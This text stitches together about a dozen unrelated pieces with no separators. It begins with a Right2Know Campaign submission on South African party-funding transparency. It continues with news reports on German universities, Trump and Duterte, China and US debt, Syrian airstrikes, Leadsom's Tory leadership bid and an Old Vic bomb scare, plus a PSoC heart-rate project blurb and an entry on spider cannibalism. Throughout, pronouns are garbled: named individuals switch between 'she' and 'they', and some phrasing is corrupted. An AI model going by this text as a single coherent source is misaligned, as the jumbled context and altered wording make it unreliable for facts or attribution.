In this submission, the Right2Know Campaign calls for regulations to ensure full transparency in the funding and finances of South Africa's political parties, and to ensure a healthy multi-party democracy.
South Africa's electoral democracy runs on money. The Constitution gives political parties a unique and sacred duty to make electoral democracy work, and that role requires funding: posters and t-shirts must be printed, offices and venues must be rented, staff paid, busses chartered. All this to bring democracy to the front door step of the average citizen.
But here lies the problem: outside of limited public funding, the vast majority of political parties' funds come from private sources, and there is no legal requirement for political parties to disclose where they get that money. This legal blind spot means that the relationship between money and politics is shrouded in secrecy. In that secret space, deals have been struck; policies have been influenced and tenders have been sold. The will of ordinary South Africans has been outbid by capital.
How big is this problem? The lack of information from political parties makes it hard to say. It is known that the vast majority of political parties' funds come from private sources. In the lead-up to the 2009 elections, by one rough estimate the political parties together spent about R550 million on campaigning, less than R93 million of which came from the Electoral Commission of South Africa (IEC) and other public funds[1]. At the same time, there are several signs that party spending (and thus fundraising) is on the rise. In the 2014 national and provincial elections, a leaked ANC document is reported to state that the party alone spent R429 million on election campaigns[2], while receiving less than R73 million in public funds from the IEC that same year[3]. At a conservative estimate, then, for every R1 of public funds provided by the IEC, political parties could be receiving R5 or R6 in undisclosed funds from private sources.
The Right2Know Campaign believes that the lack of transparency and regulation on private donations to political parties has created a climate of secrecy and political inequality, which has allowed corruption to thrive, eroded public faith in the electoral system, and undermined the values of the Constitution. There is significant evidence that some of South Africa's biggest procurement and corruption scandals, such as the 1999 Arms Deal, have included donations in exchange for tenders. In particular, we believe these problems have done untold damage to democracy and service delivery at a local level[4], where government's priorities in allocating essential services can easily be distorted by private interests[5].
The Right2Know Campaign believes this need for transparency goes beyond the need to root out corruption and malfeasance. This transparency is a crucial step towards greater political equality. As Constitutional Court Justice Edwin Cameron, in the minority judgment of My Vote Counts v Speaker of the National Assembly and Others, wrote:
“…the right to vote does not exist in a vacuum. Nor does it consist merely of the entitlement to make a cross upon a ballot paper. It is neither meagre nor formalistic. It is a rich right – one to vote knowingly for a party and its principles and programmes. It is a right to vote for a political party, knowing how it will contribute to our constitutional democracy and the attainment of our constitutional goals.
Does this include knowing the private sources of political parties' funding? It surely does.”[6]
The public has a right to know who is bankrolling the political parties and candidates that seek their votes, and those funds are spent. We therefore believe that a comprehensive legal framework is needed to promote proactive, regular disclosure of parties' private funders. To move forward, we must first dispense with the fiction that political parties are private bodies. It is clear that political parties perform a vital public role that is at the heart of the democratic process; and this comes with the need for basic public accountability and transparency.
We also believe reforms are necessary to the public funding of political parties, including greater transparency and reporting on these funds, and a reallocation of such funds to promote multiparty democracy.
We therefore welcome Parliament's move to establish an Ad Hoc Committee on the Funding of Political Parties to investigate these issues.
The long road on party funding reform
At R2K's 4th National Summit (2014), the Campaign first called for Parliament to create legislation for transparency in party funding, and committed itself to engage in mobilisation and popular education on this issue. This resolution was reiterated at R2K's 2015, 2016 and 2017 National Summits. In the lead-up to the 2014 elections, R2K joined over 60 civil society organisations in issuing a calling for all parties to disclose their financial information[7].
Unfortunately, 2017 marks two decades since Parliament first missed its opportunity to regulate private funding of political parties. In 1997, when Parliament adopted the Promotion of Multi-Party Democracy Bill (now the Public Funding of Represented Political Parties Act), it did so with the explicit exclusion of provisions that would regulate private donations to political parties. Between 2003 and 2005, when civic group IDASA took major political parties to court over their refusal to disclose their sources of funding, the ANC, through its then secretary general Kgalema Mothlanthe, asked to dismiss the case on the commitment that Parliament would produce reform legislation[8]. However, in the intervening years, this issue received scant legislative attention; in 2010 one effort by a private member to introduce a legislative proposal was dismissed in committee. It would appear there were no further developments until 2012, when My Vote Counts wrote to the Speaker of the National Assembly to request that Parliament start working on legislation; the Speaker stated that the issue was on the agenda of the Chief Whips' Forum, but it seems no further steps were taken[9].
This regrettable chain of events has denied South Africa the right to basic information about the financial matters of political parties over two decades.
Given these delays, the establishment of the ad hoc Committee is a positive step forward. However, with many missed opportunities for Parliament to engage on this policy question, explore reforms and conduct research, R2K believes that four weeks was not enough time for proper public participation and consultation that would have informed and guided the Committee's work; further, R2K believes the Committee erred when it did not grant public requests for an extension.
Proposals on private sources of funding
We believe a legal framework is urgently needed to promote transparency in the private funding of political parties. Key elements of such a law should include:
Regular, proactive disclosure from all political parties of all information about private sources of funding, including the identity of the donor and each amount. This should include all forms of donation, include goods and services. We believe this reporting should be quarterly, not yearly.
In light of the continuing poverty and inequality of our society, a minimum threshold for disclosure which should be set no higher than the average household monthly income [10] .
. Proactive disclosure by private companies of all corporate donations to political parties.
A ban on donations from private companies doing business with the state. Parliament should investigate means for corporate entities to donate to a collective fund in the interests of multi-party democracy.
Where a company or its subsidiaries does business with a state, proactive disclosure of personal donations to political parties from all executives and board members, beneficial owners, and spouses thereof.
A ban on political parties' investment vehicles.
Capacitating the IEC to conduct full oversight on private funding matters.
Public Funding of Political Parties
Public funding of political parties is essential to ensuring a vibrant multi-party democracy that is connected to citizens at the grassroots of society. Currently parties receive yearly funding from the IEC, and from Parliament and provincial legislatures for constituency offices. It is a point of concern that the amount of public funding allocated to political parties has been vastly outstripped by the influx of secret money from private sources.
However, it would be a mistake to simply increase the amount of public funding to political parties without addressing a range of problems with the public funding provisions. As it stands, there is insufficient transparency and scrutiny of how such public funds are allocated and spent. In order to safeguard multi-party democracy, we must revisit the equation by which public funding is shared among political parties. Finally, there is an unfortunate risk that political parties may use this reform process as an opportunity to simply increase public funding before the 2019 national elections and defer any regulation of private funding to some future debate.
Key elements of such reforms to public funding of parties should include:
Regular, proactive disclosure from all political parties of how public funds are spent.
More detailed guidelines from the IEC on use of public funding.
IEC-mandated audits of all party financial reports by the Auditor General.
A review of constituency funding through Parliament and provincial legislatures.
In the interest of strengthening pluralism in our multi-party democracy, the formula to allocate public funding should be adjusted to promote political diversity, with a greater proportion of funds shared equally among all political parties, and a lesser amount shared in accordance with proportional representation.
Given the risk of further delays in implementing regulation of private political funding, it is necessary to reiterate that under no circumstances should the Committee consider increasing public funding without introducing comprehensive reforms to the regulation of both private and public funding to political parties.
Need for a ‘moment of truth'
How much money do parties spend on election campaigns? What is the average donation size?
These vital questions are impossible to answer until each elected party is willing to ‘show its cards'. Without the answers, Parliament is tasked with ‘legislating in the dark' — creating regulations without any guiding data. South Africa's political parties now face a historic opportunity to overturn the legacy of political secrecy, and move South Africa forward. But this can only happen if there is full transparency on how money has shaped our politics in the past. R2K therefore believes that all parties that hold elected office should make a joint disclosure on their previous financial records, as part of this reform process, to give the people of South Africa a necessary ‘moment of truth', and bolster the Committee's ability to pass effective and appropriate regulations.
Conclusion
The Right2Know Campaign does wish to acknowledge the efforts of the Committee to explore meaningful reforms to South Africa's political landscape. In addition to this written submission, the Right2Know Campaign asks for an opportunity to make an oral presentation on this submission.
We conclude this submission also by acknowledging the efforts of many democratic activists over many years to challenge the secret influence of money on politics in South Africa, before and after the democratic transition. This includes members of political parties, civil society organisations, media organisations, public bodies and oversight institutions, and individual members of the public. We hope these efforts will bear fruit at last. R2K firmly believes that every effort to put more knowledge in the hands of the people of South Africa on how political decisions are made is a contribution towards achieving greater accountability and responsiveness from our elected officials.
Download the submission as a PDF here
[1] Open Society Foundation for South Africa, Money and Politics in South Africa: The Party Funding Challenge, Money and Politics Project, Policy Brief OSF-SA, Cape Town 2011
[2] Qaanitha Hunter, Leaked: Broke ANC Spent R429m on Election, Mail & Guardian, 28 November 2014, http://mg.co.za/article/2014-11-27-broke-anc-spent-r429m-on-election
[3] IEC, Represented Political Parties' Fund Annual Report, 2014
[4] Right2Know Campaign, “Why we need to tackle secret deals in local politics and government”, Conference Paper for ‘Political Parties in South Africa: The Interface between Law and Politics', University of Cape Town & My Vote Counts, Friday 28 August 2015. Available at: r2k.org.za/party-funding-conference-paper
[5] Craig McKune, De Lille and the Contentious Clifton Scenic Reserve Megaproject, Mail & Guardian, 10 July 2015, http://mg.co.za/article/2015-07-09-de-lille-and-the-contentious-clifton-scenic-reserve-megaproject
[6] My Vote Counts NPC v Speaker of the National Assembly and Others [2015] ZACC 31
[7] Letter to political parties, 31 March 2014. Available at: www.myvotecounts.org.za/2014/04/letter-to-political-parties
[8] Institute for Democracy in South Africa and Others v African National Congress and Others [2005]
[9] Letter from Speaker of the National Assembly to My Vote Counts, 10 December 2012
[10] The average monthly income of female-headed households was reported as R8242,58 in Stats SA's Living Conditions Survey 2014/2015 (Jan 2017)
Lea Blume, 20, is already getting off to a bad start. Though the first lecture of the semester is still a week away, they have already missed their first event.
Blume is standing in front of a lecture hall at Berlin's Humboldt University, looking exhausted. She's surrounded by other young people who are also there for orientation event scheduled for all the new students who couldn't make it on the previous day. Yesterday's orientation was the main one, Blume explains, "but at that point I didn't even know whether I'd been accepted yet."
In fact, they don't know today either, even though lectures will begin soon. All they can do is hope.
At first, Blume was accepted at a university in Frankfurt. It wasn't their first choice, but they felt they could live with it, so they paid their tuition and mailed in their documents. Then they were accepted at Berlin's Free University, which they preferred, so they asked to have their documents returned from Frankfurt. They forwarded them to Berlin and found a place to stay there.
In the end, they were also accepted at their school of choice, Berlin's Humboldt University. Hoping to expedite matters so that they would know this week where they would actually be enrolled, Blume picked up their records themselves at the Free University and carted them across the city to Humboldt University. The admissions office is still reviewing them.
An Onslaught of New Students
The new semester begins in the next few days. And this autumn, like every autumn, young people full of hope and curiosity are descending on German universities in droves. But, this time, there are more of them than ever before. Now that the advanced high-school diploma known as the Abitur is no longer an absolute prerequisite for attending university, more young people are allowed to enroll. And more -- about half of every graduating class -- also want to.
Other factors contributing to the increase in new students are the recent elimination of conscription, in addition to the fact that some German states have shortened the 13-year period of schooling normally required to obtain the Abitur.
According to the Federal Statistical Office, there were a record 2,217,604 students registered at German universities in the 2010/2011 winter semester. A new record is also expected this year.
This onslaught of new students puts the higher education system under pressure, with many universities already filled to capacity. It also puts pressure on students, who are experiencing academic freedom in closer quarters and under tighter organizational constraints. In the past, attending university was seen as the epitome of freedom, a time when the more serious side of life could wait. But, today, attending a university is extremely stressful for many students, starting on the day of the first lecture or, for some, even earlier.
A Case in Point
About 500,000 new students will be crowding into German lecture halls this year. This is roughly equal to the total number of students attending West German universities four decades ago, and this despite the rejection of many would-be students who applied this year. Some submitted 20-30 applications. Students sometimes have to directly apply to study within a particular subject area and, in many of them, it is left up to each university to decide who it accepts. Some applicants on waiting list still don't know whether they'll get a place.
Munich's Ludwig Maximilian University (LMU) is a case in point for what this onslaught means to universities. With about 49,000 students, it is Germany's second largest university, behind the University of Hagen, the country's only state-run distance-teaching university. For admission-restricted majors alone, LMU received about 31,000 applications for the winter semester, as well as more applications for other majors and the school's master's degree programs. In total, LMU received twice as many applications as it did last year.
Even for those applicants who were accepted at LMU, conditions there will be far from ideal. LMU is not a poorly rated university. On the contrary, it is located in a particularly picturesque location and has earned top marks in the federal government's Excellence Initiative competition, which channels additional funding to high-performing universities. It was also named Germany's top university only a few days ago, in addition to holding the 45th spot on the Times Higher Education World University Ranking.
But even at a university as well-funded and celebrated as LMU, students are often left to fend for themselves.
The much anticipated meeting between oft-compared President Rodrigo Duterte and United States President Donald Trump may finally happen in November, when the American leader comes to the Philippines.
In a tweet Thursday, United States Vice President Mike Pence confirmed that Trump will attend the US-Asean Association of Southeast Asian Nations (ASEAN) Summit and the East Asia Summit, both to be held in the Philippines in November.
It would be Trump's first trip to the Philippines as US President, and likely the first meeting with Duterte. The two leaders have often been compared for their brash language and in-your-face leadership style.
Pence also confirmed the US leader's attendance at the Asia-Pacific Economic Cooperation (APEC) leaders' meeting set in the same month in Da Nang, Vietnam.
Privileged to inform @ASEAN leaders that @POTUS will attend US-ASEAN & E Asia Summits in Nov in the Philippines & APEC mtg in Vietnam #VPinASIA pic.twitter.com/HR8o8hcfDN — Vice President Pence (@VP) April 20, 2017
Pence bared Trump's upcoming Southeast Asia visits while visiting Jakarta, a trip seen to highlight US support for Southeast Asia and Indonesia's moderate practice of Islam amid concerns over growing Islamophobia among Americans.
Former US president Barack Obama, who had championed a "pivot to Asia," was a frequent visitor to the Asia-Pacific as they sought to refocus US foreign policy on the region to counter growing Chinese influence.
Trump's decision to attend the meetings could come as a surprise to some, given their fiery "America first" rhetoric and their decision to abandon a Pacific trade pact which was the economic plank of the pivot.
The president's attendance at the meetings was "a sign, I hope to all, of our firm and unwavering commitment to build on the strong foundations that we already share", Pence said during a visit to Indonesia.
— With reports from Reuters, Agence France-Presse
ap China's official comment on the S&P downgrade was harsh and condescending. Released through Xinhua (via Reuters) the statement condemned America for its "debt addiction" and "short-sighted" political wrangling.
"The U.S. government has to come to terms with the painful fact that the good old days when it could just borrow its way out of messes of its own making are finally gone," Xinhua wrote.
China said it will accelerate diversification away from US treasuries, and that meanwhile it demands reform: "China, the largest creditor of the world's sole superpower, has every right now to demand the United States address its structural debt problems and ensure the safety of China's dollar assets," Xinhua said.
The statement also called for a new global currency: "International supervision over the issue of U.S. dollars should be introduced and a new, stable and secured global reserve currency may also be an option to avert a catastrophe caused by any single country," Xinhua said.
In today's project, we implement a BLE Heart Rate Monitor with PSoC 4 BLE.
A common method to measure heart rate pulses is by using Photoplethysmography (PPG), which uses LEDs to illuminate the skin and photodiodes to measure reflected light, allowing us to measure changes in the amount of absorbed light.
More from wikipedia - With each cardiac cycle the heart pumps blood to the periphery. Even though this pressure pulse is somewhat damped by the time it reaches the skin, it is enough to distend the arteries and arterioles in the subcutaneous tissue. If the pulse oximeter is attached without compressing the skin, a pressure pulse can also be seen from the venous plexus, as a small secondary peak. The change in volume caused by the pressure pulse is detected by illuminating the skin with the light from a light-emitting diode (LED) and then measuring the amount of light either transmitted or reflected to a photodiode. Each cardiac cycle appears as a peak, as seen in the figure. Because blood flow to the skin can be modulated by multiple other physiological systems, the PPG can also be used to monitor breathing, hypovolemia, and other circulatory conditions. Additionally, the shape of the PPG waveform differs from subject to subject, and varies with the location and manner in which the pulse oximeter is attached.
An Analog Front End (AFE) can be implemented using the programmable analog blocks (opamps, comparators) on the PSoC 4 BLE device. This AFE can directly interface with the pulse oximeter (sensor) and sense changes in values that are eventually digitized by the SAR ADC Component. The ADC output is filtered using an FIR filter and then converted into actual heart rate values.
The BLE Component is configured with the GATT Profile for a Heart Rate Sensor. A BLE Client like a cell phone or laptop can read these heart rate values using the standard GATT Profile. Additionally, this project implements the BLE Battery Service to transmit battery information to the Client.
You can download this PSoC Creator project here from GitHub: https://github.com/cypresssemiconductorco/PSoC-4-BLE/tree/master/100_Projects_in_100_Days/Day045_Optical_Heart_Rate_Monitor
At least 32 civilians, including women and children, have been killed in US-led airstrikes against Islamic State militants in Syria, said a monitoring group. All in all, 553 people died in the month-long campaign against the extremists.
Anti-ISIS coalition bombing terrorist positions in Iraq and Syria LIVE UPDATES
Among the 32 civilians killed there were six children and five women, said the Syrian Observatory for Human Rights (SOHR), a UK-based group.
The majority of deaths – 464 out of 553 were the members of Islamic State (IS, formerly ISIS/ISIL). Fifty-seven fighters from Al-Nusra Front, an affiliate of Al-Qaeda in Syria, were also killed in the campaign.
According to the observatory director Rami Abdel Rahman, the "vast majority" of militants killed in the airstrikes were foreign fighters who joined IS militants in Syria, reported AFP.
According to the monitor, the US-led airstrikes were carried out in five Syrian provinces, including Aleppo, the most populous governorate, in the north of the country. Four other provinces where the strikes hit their targets were Deir al-Zor (east), Idlib (northwest), Raqqa (north) and al-Hassakah (north).
The US justified its strikes in Syria under Article 51 of the UN Charter, which says countries have rights to engage in self-defense against an armed attack.
“Nothing in the present Charter shall impair the inherent right of individual or collective self-defense if an armed attack occurs against a Member of the United Nations, until the Security Council has taken measures necessary to maintain international peace and security,” the article states.
US military targets ISIS, 2 days & 25 airstrikes in Syria and Iraq
On Saturday, the SOHR said that 10 civilians, including a child, were killed in US-led airstrikes.
However, Washington said there is no evidence to prove the information of Observatory's report from Saturday.
"We have seen no evidence at this time to corroborate claims of civilian casualties. I can assure you that before any mission, every precaution is taken to ensure civilians are not harmed," US Central Command spokesperson Colonel Patrick Ryder said.
“Regardless, we take reports of civilian casualties or damage to civilian facilities seriously and we have a process to investigate each allegation,” they added.
IS militants have been capturing territory in Iraq and Syria since June, taking cities in both countries. The US-led coalition started bombing IS targets in Iraq in August, and in Syria in September.
Richard Spencer is President Donald Trump's second pick to be the Navy's top civilian official. | Getty Trump taps Spencer to be Navy secretary
President Donald Trump has tapped financier Richard Spencer to be Navy secretary, the White House announced Friday.
Spencer is Trump's second pick to be the Navy's top civilian official. Another wealthy financier, Philip Bilden, was Trump's first choice. They withdrew due to problems untangling their finances.
Story Continued Below
Spencer is now the managing director of venture capital firm Fall Creek Management. They served as an officer in the Marine Corps and held a spot on the Defense Business Board, serving as vice chairperson.
Spencer's nomination must be confirmed by the Senate. They would be the second service secretary to be confirmed, after Air Force Secretary Heather Wilson. Trump has yet to settle on a nominee for Army secretary after two previous picks withdrew.
Merulla, by contrast, called putting off a public endorsement a "weak-kneed" tactic, suggesting public perception of council's position on LRT is "inconsistency, unpredictability and chaos."
Coun. Chad Collins, who makes no bones about their opposition to LRT, reiterated they would vote against endorsing the project when the time comes. They suggested council concerns would grow as more details come out about the multi-year, technically challenging construction project.
Councillors like Brenda Johnson, Maria Pearson and Doug Conley said they voted for the referral out of a desire to hear a full staff presentation first. They said supporting the referral is not necessarily a reflection of their support — or lack thereof — for the project.
Coun. Terry Whitehead said they supported the referral as "a matter of courtesy" to council colleagues who want more information. Whitehead said they continue to have concerns about the project.
"But I don't think we're advancing the city if we say no to a billion dollars," they added, suggesting the city must push for more funding to improve bus service throughout the city.
Coun. Rob Pasuta said "there's a question mark" around their support for LRT, adding he's worried both about the impact on business from construction — and the political fallout if the city should turn down money it asked for in the first place.
At the same time, Pasuta said council can't put off a vote clarifying its position indefinitely.
"Something has to be solidified," they said.
In favour of deferral: Doug Conley, Maria Pearson, Brenda Johnson, Rob Pasuta, Judi Partridge, Chad Collins, Tom Jackson, Donna Skelly and Terry Whitehead
Opposed: Sam Merulla, Fred Eisenberger, Matthew Green, Aidan Johnson, Jason Farr and Lloyd Ferguson.
mvandongen@thespec.com
905-526-3241 | @Mattatthespec
Pro-Brexit contender appeals to grassroots by saying they did not like gay marriage law and vowing to repeal foxhunting ban
Andrea Leadsom has made a clear pitch to rightwing Conservative party members who will decide the new prime minister, saying they did not like David Cameron's gay marriage legislation and would want to repeal the foxhunting ban.
The leading Brexit candidate, who is up against the frontrunner Theresa May, outlined a range of policy proposals on Thursday that appeared designed to appeal to the 150,000-odd Tories who will vote in the contest.
As a junior minister who has been in parliament just six years, Leadsom is the insurgent candidate against May.
Before the final round of voting by MPs, they gave a speech to activists promising “prosperity, not austerity”, ditching the economic strategy of their former boss George Osborne, before their supporters marched on parliament chanting “What do we want? Leadsom for leader. When do we want it? Now.”
They used a series of television interviews to explain their views on everything from religion to when to take the country to war, as members weigh up whether to go for the experienced hand of May or a fresh-faced newcomer.
On same-sex marriage, Leadsom said they supported partnerships between gay couples but had reservations about the legislation that led them to abstain during the parliamentary vote.
“I believe that the love of same-sex couples is every bit as valuable as that of opposite-sex couples,” they told ITV. “But nevertheless, my own view is that marriage in the biblical sense is very clearly, from the many, many Christians who wrote to me on this subject, in their opinion, can only be between a man and a woman. I don't agree with them, to be specific.
“But what I do think is that I would have preferred civil partnership to be available to heterosexual and gay couples and for marriage to have remained as a Christian service for men and women who wanted to commit in the eyes of God.
“Civil partnerships are called marriage as well. The concern I had was the potential compulsion for the Church of England. I don't think the Anglican church should be forced down a route when many Christians aren't comfortable about it.”
They said there was “very clear hurt” caused by the legislation to many Christians and claimed the UK had “muddled the terms of marriage, civil partnership, registry office, church”.
“I didn't really like the legislation, that was the problem, but I absolutely support gay marriage,” they said.
Leadsom was pressed about their religious beliefs, with Channel 4 News asking them whether they were spoken to directly by God.
“That question is not one that is for open laughing at and poking fun at,” they said. “I can absolutely feel that that's what you would like to. So I absolutely am a Christian and I am very proud of it. It absolutely acts in the background in my desire to have a very honest campaign with high integrity and so on.
“But if you are asking me, am I going to be sort of saying, ‘Oh well God's told me to do this and do that,' well of course that's not the case.”
Leadsom said they would commit to holding a vote to repeal the hunting ban as it was “absolutely not proven to be in the interest of animal welfare whatsoever”.
They said there was a “need to exterminate vermin, which foxes are” and called for a “proper licensed regime”.
Earlier, Leadsom continued to face pressure over claims about their 25-year finance career, which they had attempted to silence by publishing their CV this week.
After critics raised fresh questions about inconsistencies on Wednesday, Leadsom told the BBC that they had never claimed to be a fund manager, although they had worked for fund management companies, and they stood by their assertion that they had managed large teams of about 40 to 50 people at Barclays.
Some of their supporters have claimed they managed billions in funds, and in the House of Commons in 2010 they said: “I have been in investment banking and funds management for 23 years.” But their allies say they were always clear they worked in the fund management industry rather than specifically as a fund manager.
Leadsom said they stood by their CV and did not regret anything about how they had presented their experience before parliament.
“My CV as I've presented it is exactly accurate,” they said. “There is nothing to regret, my CV is exactly accurate.”
They have also faced scrutiny over their tax affairs, promising to publish details of their return only if they made the shortlist, and saying it was quite “boring”.
Separately, it was reported that they had helped set up a school exchange project with a Christian charity in Uganda that was co-run by a religious group linked to “gay cure” ministries.
Tory leadership battle: Andrea Leadsom says 'let's banish pessimists' – live Read more
Leadsom's supporters argue they have been unfairly targeted by people wanting to bring down their campaign. Tim Loughton, a Tory MP and their campaign chief, said: “A lot of people have been trying to turn Andrea over. If, frankly, the best thing they can do is their job title back in 199-whatever, it really shows they are pretty desperate.”
They stressed that Leadsom would not be taking any money or help from Arron Banks, the Ukip donor and founder of the Leave.EU group, after speculation that they may support their campaign.
Leadsom's appeal to the right of the party was already worrying their rivals. Allies of Michael Gove had conceded they were likely to be the second candidate alongside May and that they may well appeal to the grassroots of the Conservatives in the same way as Jeremy Corbyn has captured the imagination of Labour members.
Gove's campaign chief, Nick Boles, had to apologise on Wednesday after pleading with fellow MPs to stop the “frightening” prospect of Leadsom becoming prime minister.
In their speech on Thursday, Leadsom sought to stress that they wanted to govern for everybody, not just elites, and would be a prime minister of tolerance and hope who would help Britain be the greatest country in the world.
“I'm an optimist. I truly believe we can be the greatest nation on Earth. As we show the UK is once again open to the world and united in our new destiny, so we will expand our horizons,” they said.
Sterling hits new 31-year low against the dollar Read more
The audience cheered as they said: “Prosperity should be our goal, not austerity. I want to spread prosperity to every corner of our country. I want to help create more jobs, because we need to hear and heed millions of our fellow citizens who feel and fear our country's leaders are not worrying about them enough.”
Echoing messages of Boris Johnson and the Vote Leave campaign, they said they wanted to listen to those who did not like bosses of big businesses getting “telephone number salaries” and instead create “higher pay for the many”.
“I am with you and I want you to share in the great future for this country,” they said. “I want to lead a nation where anyone who aims high can achieve their dreams. My first task is to show how great our nation is.”
To applause from Conservative activist supporters, Leadsom said they wanted to “banish the pessimists”.
Addressing concerns about the economic consequences of Brexit, they said the lower pound would be good for exports and claimed the stock market had already recovered. Leadsom also sought to reassure the financial markets that Britain could cope with leaving the EU.
The FTSE 100 index has recovered losses following the Brexit vote but the FTSE 250, which includes smaller firms, is nearly 10% down from the day of the vote.
“No one needs to fear our decision to leave the EU,” Leadsom said. “Trade must be the top priority, continued tariff-free trade with the EU, continued free trade with those countries we have agreements with as a current member of the EU, and vitally seeing the opportunities to take up free trade agreements with fast-growing economies around the world.”
They said the UK was “open for business and a great place to employ people”, and they believed Britain had “a great future ahead of us”.
May's response appears to be to try to outflank Leadsom to the right on the issue of immigration. Leadsom promised on Thursday to allow all EU citizens currently in the country to stay, but May's campaign suggested this would allow foreign criminals to stay.
A spokesperson for May said: “Andrea Leadsom's commitment to give permanent residence to foreign criminals is concerning – and is exactly the kind of misjudgment that their inexperience can cause. That's why we need strong, proven leadership – something only Theresa can offer.”
Nephila sp. consuming a conspecific (member of the same species) consuming a conspecific (member of the same species)
Spider cannibalism is the act of a spider consuming all or part of another individual of the same species as food. In the majority of cases a female spider kills and eats a male one before, during, or after copulation. Cases in which males eat females are rare.
Females eating males [ edit ]
Araneus diadematus. The courting male is wrapped by the female before it has successfully copulated. A couple of. The courting male is wrapped by the female before it has successfully copulated.
It is often said that the male (usually significantly smaller than the female, down to 1% of their size as seen in Tidarren sisyphoides) is likely to be killed by the female after the coupling, or sometimes even before intercourse has been initiated. This supposed propensity is what gave the black widow spider, Latrodectus mactans, its name. However, the three species of North American black widows do not usually kill the male (although they have been known to do so). Males can sometimes even live in the web of a female for a while without being harmed in any way. The male Australian redback spider Latrodectus hasselti is killed by the female after they insert their second palpus in the female genital opening; in over 60% of cases the female then eats the male.
Although the male Latrodectus hasselti may sometimes die during mating without the female actually consuming him, this species represents a possible strategy of "male sacrifice". The male redback, while copulating, "somersaults" and twists their abdomen directly onto the fangs of their mate. Approximately 65% of males are consumed at this stage.[1] Males that "sacrifice" themselves gain the benefit of increasing their paternity relative to males who do not get cannibalized.[1]
Despite these examples and many other similar reports, however, the theory of the "sacrificial male" has become greater than the truth. Mating of spiders is not always followed by cannibalism. Indeed, scholars have noted that the "supposed aggressiveness of the female spider towards the male is largely a myth" and that cannibalism only occurs in exceptional cases.[2][3] Even so, spider cannibalism has been shown to occur in some species more than in others, mainly species belonging to Latrodectus.
There has always been speculation on why this sacrifice of male mates might occur despite the obvious disadvantage to the sacrificial males. One theory is that once the male has mated, they are unlikely to mate again and so any further extension of their life is of lesser evolutionary benefit than theirs indirectly contributing nutrition to the eggs. Having more offspring would give the male the advantage of having their genes passed on over other males that might avoid being eaten. This scenario would be consistent with Roberts' hypothesis that old or unfit males get eaten, whilst younger and fitter ones may survive to mate again.[3]
Males eating females [ edit ]
Reversing the traditional roles, species that have males consuming females are relatively unknown; the few that do show a male-biased sexual dimorphism. Examples include Allocosa brasiliensis, Evarcha culicivora, and Argyronetia aquatica. Male water spiders, Argyronetia aquatica, show a predilection for mating with larger females, while cannibalizing females smaller than themselves.[4]
As is the case with Allocosa brasiliensis, males cull older females who are less fertile than their young counterparts.
Sacrificial mothers [ edit ]
Offspring of the species Stegodyphus lineatus eat their mother.
eat their mother. A female of Segestria florentina will sometimes die while guarding their eggs, and the hatched spiders will later eat them
Non-reproductive cannibalism [ edit ]
Some spiders, such as Pholcus phalangioides, will prey on their own kind when food is scarce. Also, females of Phidippus johnsoni have been observed carrying dead males in their fangs. This behavior may be triggered by aggression, where females carry over hostility from their juvenile state and consume males just as they would prey. Sih and Johnson surmise that non-reproductive cannibalism can occur due to a remnant of an aggression trait in juvenile females. Known as the "aggressive spillover hypothesis", this tendency to unselectively attack anything that moves is cultivated by a positive correlation between hostility, foraging capability, and fecundity. Aggression at a young age leads to an increase in prey consumption and as such, a larger adult size. This behavior "spills over" into adulthood, and shows up as a nonadaptive trait that manifests itself through adult females preying on males of their same species.[5]
See also [ edit ]
Grassley: Ending Estate Tax Recognizes Investors Over Spenders
Enlarge this image toggle caption J. Scott Applewhite/AP J. Scott Applewhite/AP
Iowa Republican Sen. Chuck Grassley, commenting on the GOP tax overhaul, tells The Des Moines Register that ending the estate tax is about rewarding people who invest over those who spend everything they earn on "booze or women or movies."
A promise to end the so-called death tax has been a bulwark of Republican electoral politics for decades. A House version of the bill would do just that by 2024; however, the Senate's version of the tax overhaul, which narrowly passed the chamber early Saturday, would keep it, but instead double the current exemption to $11 million from $5.5 million per individual. For married couples, the current exemption is already at $11 million.
"I think not having the estate tax recognizes the people that are investing, as opposed to those that are just spending every darn penny they have, whether it's on booze or women or movies," Grassley, a member of the Senate Finance Committee, told the Register on Saturday.
The senator's remarks elicited a harsh response on social media, with one Twitter user commenting: "I'm sure those folks would love to invest, but they're a bit preoccupied just trying to make ends meet."
The elimination of the estate tax benefits a tiny fraction of taxpayers. The nonpartisan Center on Budget and Policy Priorities estimates that for 2017, fewer than 2 in 1,000 estates will owe any estate tax, or about 0.2 percent.
Grassley has been an especially strong proponent of ending the estate tax, claiming that it hurts Iowa families trying to pass their farms from one generation to the next. But in an editorial published over the weekend, the Register wrote: "a review of federal tax data and nonpartisan research on the subject shows that family farmers and small business owners represent a tiny share of estate tax payers, and that the taxes they owe rarely force them to sell land or quit farming."
The Hill writes:
Star Wars actor John Boyega has been caught up in a bomb scare at London's Old Vic theatre where they are starring in Cold War play Woyzeck.
Stunned onlookers said the 25-year-old Hollywood star was ordered to leave the stage during the drama in Waterloo in the centre of the British capital.
They were spotted 'walking down the street' to an evacuation point with the 1,000-strong audience and other cast members after police rushed everyone out of the Grade II-listed theatre, which first opened in the 1800s.
Officers are said to have raised 'concerns' about an object found in the building with staff in fluorescent jackets flooding the auditorium and calling a halt to the performance 10 minutes in.
Roads were cordond off with emergency vehicles and fire engines in attendance at the scene while police dogs were spotted searching the area.
Boyega has won critical acclaim for their role in Woyzeck and has been described as 'compelling to watch' in the gritty play, which is set in the 1980s Berlin.
The Old Vic theatre has been evacuated and police have cordoned off the surrounding roads
Star Wars actor John Boyega, pictured, is playing the lead role in Woyzeck - a play about 1980s Berlin during the Cold War. They were on stage when the bomb incident unfolded
Audience members were left waiting outside after the evacuation just 10 minutes into a production of Woyzeck
More than 1,000 people are thought to have been evacuated from the theatre which was reportedly at full capacity.
Liam Joseph, who was in the audience but is themselves an usher, told MailOnline: 'I knew something was up.
'When that [an evacuation] happens it's either a fire drill or it might be a bomb.
'The company manager came on while John Boyega was on stage, asked the audience to remain calm and said the show was going to end. Then the duty manager said 'please evacuate'.
More than 1,000 people are thought to have been evacuated from the theatre which was reportedly at full capacity
The Grade II-listed theatre first opened in the 1800s (stock photo)
'The front of house staff in their fluorescent jackets evacuated everyone out safely and quickly in two or three minutes - it was incredible.
'As we were being evacuated police cordoned off the area.
They added: 'John Boyega was just with us walking down the street. It was all done very efficiently with a real sense of calm but your heart's in your mouth and not many people knew what was going to happen.'
The Old Vic said in a statement: 'We have been evacuated as a precaution; audience safety is our priority. We are liaising with the Met Police.'
A Metropolitan Police spokesperson said: 'Police were called at 14:38pm on Saturday, May 27, to The Cut, Waterloo, to a report of a security alert at a theatre.
